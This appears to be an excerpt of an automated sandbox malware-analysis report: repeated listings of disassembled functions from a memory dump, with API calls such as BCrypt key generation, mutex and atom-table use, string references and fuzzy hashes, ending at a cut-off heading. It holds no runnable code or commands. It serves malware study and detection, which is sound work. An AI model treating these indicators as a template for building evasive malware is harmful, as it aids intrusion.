Instruction Fuzzy Hash: E881A2F09182188FEB24DF14C895BAAB7F4EF45304F1045EEE609A7282E7749E94CF55

Uniqueness

Uniqueness Score: -1.00%

Function 002C1039 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 370COMMON

Download Yara Rule

Strings

, xrefs: 002C177E

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-3916222277
Opcode ID: 596f864ab5a1b3933eb91143f93309727abb3f77fed8b1aa5dbaa307a97cddfa
Instruction ID: b2abb9abc45cfab24c5ecd295aad6837f6b0fc9d8c26f335cfc305d3be7b1e32
Opcode Fuzzy Hash: 596f864ab5a1b3933eb91143f93309727abb3f77fed8b1aa5dbaa307a97cddfa
Instruction Fuzzy Hash: DBF13CB08142188BDB24EF14CC95BEDB7F4AF45304F1045DEE64AA7282EB785A94CF19

Uniqueness

Uniqueness Score: -1.00%

Function 002C111B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

, xrefs: 002C177E

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-3916222277
Opcode ID: 18ea0bf077c7443f764448211fefb11fb7dbfff07c2fc07ae5012d4e2c359758
Instruction ID: 9b7f51294fdddccec7325b2ed10619a92bcb52faa96f928e75561e8f26ff2215
Opcode Fuzzy Hash: 18ea0bf077c7443f764448211fefb11fb7dbfff07c2fc07ae5012d4e2c359758
Instruction Fuzzy Hash: ECE13EB0814218CBDB24EF14D895BEDB7F4BF46304F1045DEE64AA7282EB785A94CF19

Uniqueness

Uniqueness Score: -1.00%

Function 002C1112 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 326COMMON

Download Yara Rule

Strings

, xrefs: 002C177E

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-3916222277
Opcode ID: c306933c546babc0e8b491edab4b8ff28aa255f8002bf7651c0cd18fac7534b4
Instruction ID: 68f4d64bdb546ea7042d95e743ffdebbd8848e6a602678b6c6f26f6750b1d324
Opcode Fuzzy Hash: c306933c546babc0e8b491edab4b8ff28aa255f8002bf7651c0cd18fac7534b4
Instruction Fuzzy Hash: F2E12EB0814218CBDB24EF14DC95BEDB7F4AF46304F1045DEE64AA7282EB785A94CF19

Uniqueness

Uniqueness Score: -1.00%

Function 002C1156 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 315COMMON

Download Yara Rule

Strings

, xrefs: 002C177E

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-3916222277
Opcode ID: 67452ae9d8e8cd61302377048a211b467eab5688e89f546b06d8401333198983
Instruction ID: 9364509c21b803d306be1249df986943c1c8f014c6b9ff375db13c37c8f2c3c3
Opcode Fuzzy Hash: 67452ae9d8e8cd61302377048a211b467eab5688e89f546b06d8401333198983
Instruction Fuzzy Hash: 74E13EB0814228CBDB24EF14D895BEDB7F4BF45304F1045DEE649A7282EB785A94CF19

Uniqueness

Uniqueness Score: -1.00%

Function 002C11AC Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 302COMMON

Download Yara Rule

Strings

, xrefs: 002C177E

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-3916222277
Opcode ID: 6395c42bfd3d2550444859da21955b88491cbd9925378621ff93f584d9077e3d
Instruction ID: 378a0d58916151111de2d946a81830e4f4a38752160ba198f1bef07c1d4f301b
Opcode Fuzzy Hash: 6395c42bfd3d2550444859da21955b88491cbd9925378621ff93f584d9077e3d
Instruction Fuzzy Hash: 6FD140B0814228CBDB24EF14DC95BEDB7F4AF46304F1045DEE649A7282EB785A94CF19

Uniqueness

Uniqueness Score: -1.00%

Function 002C11CF Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

, xrefs: 002C177E

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-3916222277
Opcode ID: 32e459492d80e6bf050ec46c80caa78d5240fadb3646de58b5e24a502b89e2e4
Instruction ID: d4b1f07386264bf8609c292fde54671ec55209f88c9f2e37c785294f32f53d30
Opcode Fuzzy Hash: 32e459492d80e6bf050ec46c80caa78d5240fadb3646de58b5e24a502b89e2e4
Instruction Fuzzy Hash: 29D12FF0814228CBDB24EF14D895BEDB7F4AF46304F1045DEE649A7282EB785A94CF19

Uniqueness

Uniqueness Score: -1.00%

Function 002C12CC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

, xrefs: 002C177E

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 171e6244e31e669c012d23e9fc06d2caae85b7187b6750f48e486d3abb2977bf
Instruction ID: 761f5717bcc47be66bdd416242df71c53d4d0672cbb61a045f0c3d0b8de6947c
Opcode Fuzzy Hash: 171e6244e31e669c012d23e9fc06d2caae85b7187b6750f48e486d3abb2977bf
Instruction Fuzzy Hash: 94C15DB0814228CBDB24EF14DC95BE9B7F4BF46304F1045EEE609A7282EB755A94CF19

Uniqueness

Uniqueness Score: -1.00%

Function 002C13BB Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 222stringCOMMON

Download Yara Rule

APIs

Part of subcall function 002B7164: strlen.MSVCRT ref: 002B7180

BCryptOpenAlgorithmProvider.BCRYPT(00000000,?,?,?,00000000,00000000,00000000,00000000,?,?), ref: 002C1735
BCryptSetProperty.BCRYPT(?,?,?,?,?,?,00000000,?), ref: 002C1799
strlen.MSVCRT ref: 002C17B2
BCryptGenerateSymmetricKey.BCRYPT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002C1823

Strings

, xrefs: 002C177E

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: Crypt$strlen$AlgorithmGenerateOpenPropertyProviderSymmetric
String ID:
API String ID: 3605869805-3916222277
Opcode ID: e66c084b480afb79207977789fd581e895a296ffce5e59b9b755ed48fb10f902
Instruction ID: e75160d34dcbbb4c42c6cddf374296fdb7c0cffbf17f3992936bc644fc5eccd6
Opcode Fuzzy Hash: e66c084b480afb79207977789fd581e895a296ffce5e59b9b755ed48fb10f902
Instruction Fuzzy Hash: 1BA170B0818319CFDB24EF14C899BAEB7F4AF46304F1045DEE649A7282E7784A94CF55

Uniqueness

Uniqueness Score: -1.00%

Function 002C1399 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216stringCOMMON

Download Yara Rule

APIs

Part of subcall function 002B7164: strlen.MSVCRT ref: 002B7180

BCryptOpenAlgorithmProvider.BCRYPT(00000000,?,?,?,00000000,00000000,00000000,00000000,?,?), ref: 002C1735
BCryptSetProperty.BCRYPT(?,?,?,?,?,?,00000000,?), ref: 002C1799
strlen.MSVCRT ref: 002C17B2
BCryptGenerateSymmetricKey.BCRYPT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002C1823

Strings

, xrefs: 002C177E

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: Crypt$strlen$AlgorithmGenerateOpenPropertyProviderSymmetric
String ID:
API String ID: 3605869805-3916222277
Opcode ID: ec78cc2926c57d40bb8bf89ba42575996dd71c5fec11b81d24266d75ae513acd
Instruction ID: 7fd36136cccbc1cb2a11ae29ff0d28d5c1362ad74e9b92611a402a2796a9bc67
Opcode Fuzzy Hash: ec78cc2926c57d40bb8bf89ba42575996dd71c5fec11b81d24266d75ae513acd
Instruction Fuzzy Hash: 36A14EB0818319CBDB24EF14C899BADB7F4AF46304F1045DEE649A7282E7784A94CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004171DC Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 400COMMON

Download Yara Rule

Strings

basic_string::erase, xrefs: 004175E6

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: strlen
String ID: basic_string::erase
API String ID: 39653677-2431230105
Opcode ID: d9fecef5035712300b84deb7a91b7ba52ece9c34812b8e4bd96e88b1958bea7a
Instruction ID: 90b7ea04515e4ce733c7ff350b68a6c7942405708d31c4a407160885e2b73d70
Opcode Fuzzy Hash: d9fecef5035712300b84deb7a91b7ba52ece9c34812b8e4bd96e88b1958bea7a
Instruction Fuzzy Hash: 65E186B1A0C2089FE714DB58D844BEEB7F5EB89310F20846EE54997381DB3C5D86CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 003A715D Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?,?,0050C340,?,003A6EE5), ref: 003A7177

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 4a0a0ee94852d6c5a57d5ff85045f77636cbaf5558bee2bf2787ecd150693df2
Instruction ID: f3c3ba07b4794c2edf685a8066b6d54608bf885cae63a91895b987e0aa16f052
Opcode Fuzzy Hash: 4a0a0ee94852d6c5a57d5ff85045f77636cbaf5558bee2bf2787ecd150693df2
Instruction Fuzzy Hash: F9F030B000C6409BD301BF69C6A572FBAE5EF85705F12892DE4C58B382D7BA88469B57

Uniqueness

Uniqueness Score: -1.00%

Function 00404E50 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 153synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,01250D24,?,003FEAF5,?,?,?,00000001,00401895), ref: 00404E57
CreateMutexA.KERNELBASE ref: 00404F4A
WaitForSingleObject.KERNEL32 ref: 00404F60
FindAtomA.KERNEL32 ref: 00404F7A
AddAtomA.KERNEL32 ref: 00404FBC
_onexit.MSVCRT ref: 00404FDF
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404FE7
FindCloseChangeNotification.KERNELBASE ref: 00404FF3

Strings

failed to get string from atom, xrefs: 004050DA
failed to add string to atom table, xrefs: 004050A9
failed to to lock creation mutex, xrefs: 004050BA
;, xrefs: 0040501D

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: AtomFindMutex$ChangeCloseCreateCurrentNotificationObjectProcessReleaseSingleWait_onexit
String ID: ;$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
API String ID: 2012525949-2569584454
Opcode ID: c3d0342f0379e03968cb4cab845f6044bdc0b3e3ff68116d384f4b8718a1fcec
Instruction ID: 09f708ad42ca80f05c88c012e2127b0baad3b77b78c3fcee3e2cef3113ab0339
Opcode Fuzzy Hash: c3d0342f0379e03968cb4cab845f6044bdc0b3e3ff68116d384f4b8718a1fcec
Instruction Fuzzy Hash: C85107F86042418FD7106F3D9C4A31F3EE0B792305F148A7EDA85DB3D2E67894499B96

Uniqueness

Uniqueness Score: -1.00%

Function 003FB6C0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 153synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000001,01250D24,?,003FC30D,?,?,?,?,-00000004), ref: 003FB6C7
CreateMutexA.KERNELBASE ref: 003FB7BA
WaitForSingleObject.KERNEL32 ref: 003FB7D0
FindAtomA.KERNEL32 ref: 003FB7EA
AddAtomA.KERNEL32 ref: 003FB82C
_onexit.MSVCRT ref: 003FB84F
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003FB857
FindCloseChangeNotification.KERNELBASE ref: 003FB863

Strings

failed to get string from atom, xrefs: 003FB94A
failed to to lock creation mutex, xrefs: 003FB92A
failed to add string to atom table, xrefs: 003FB919
6, xrefs: 003FB88D

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: AtomFindMutex$ChangeCloseCreateCurrentNotificationObjectProcessReleaseSingleWait_onexit
String ID: 6$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
API String ID: 2012525949-4098003961
Opcode ID: 679ee20bbecf877c010f87fcd3d862d584e5e060912f4c82dbd571c138bf9f43
Instruction ID: 1d2fa0489d47ad1506106df6dd760cf091ffd98427bd86ecfe5d309b3fba95a6
Opcode Fuzzy Hash: 679ee20bbecf877c010f87fcd3d862d584e5e060912f4c82dbd571c138bf9f43
Instruction Fuzzy Hash: D0514BF56082848BCF006F3CD85A33FBEE4BB91306F158A2DD5868B296D778C44C9742

Uniqueness

Uniqueness Score: -1.00%

Function 00400710 Relevance: 15.2, APIs: 10, Instructions: 174COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00400764

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 16ad6ca08235d69c98415bc06c6311db7be9e8a5e43ec12e0037f4c49ba9a5ed
Instruction ID: 8ff2394bd4ff680839bbeab8aaa3350dbcafce3dcb83b7b379388caefee1cb22
Opcode Fuzzy Hash: 16ad6ca08235d69c98415bc06c6311db7be9e8a5e43ec12e0037f4c49ba9a5ed
Instruction Fuzzy Hash: ED617BB46043008FD714AF29E88571B7BE0BF95304F10493EE9859B3A1E778E848CF96

Uniqueness

Uniqueness Score: -1.00%

Function 003B9F6F Relevance: 9.8, APIs: 4, Strings: 2, Instructions: 760stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 003B9FAE
strlen.MSVCRT ref: 003BA3DC
strlen.MSVCRT ref: 003BA3E8

Part of subcall function 0038E956: strlen.MSVCRT ref: 0038E96A

Part of subcall function 0037198D: strlen.MSVCRT ref: 003719A2

strcmp.MSVCRT ref: 003BA18A

Part of subcall function 00375883: free.MSVCRT(?,?,00000000,?,0038A665,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0037590E

Strings

6NO, xrefs: 003BA75A
rnal, xrefs: 003BA653

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: strlen$strcmp$free
String ID: 6NO$rnal
API String ID: 1243818084-1130775394
Opcode ID: 07ee3e18117a00d5aaf4a6eac7e4fb8f8aa8d53eda2ca7c17092f50589e52656
Instruction ID: af40b51f995ad69de72f5a41a1e5de7d900f3dad10cf1ed4e63aa78cf0cc852b
Opcode Fuzzy Hash: 07ee3e18117a00d5aaf4a6eac7e4fb8f8aa8d53eda2ca7c17092f50589e52656
Instruction Fuzzy Hash: 38820270A04B19CFEB21DF28C884B99BBF1BF45308F0585E9D9889B742D7759A84CF52

Uniqueness

Uniqueness Score: -1.00%

Function 002BF807 Relevance: 8.0, APIs: 5, Instructions: 518fileCOMMON

Download Yara Rule

APIs

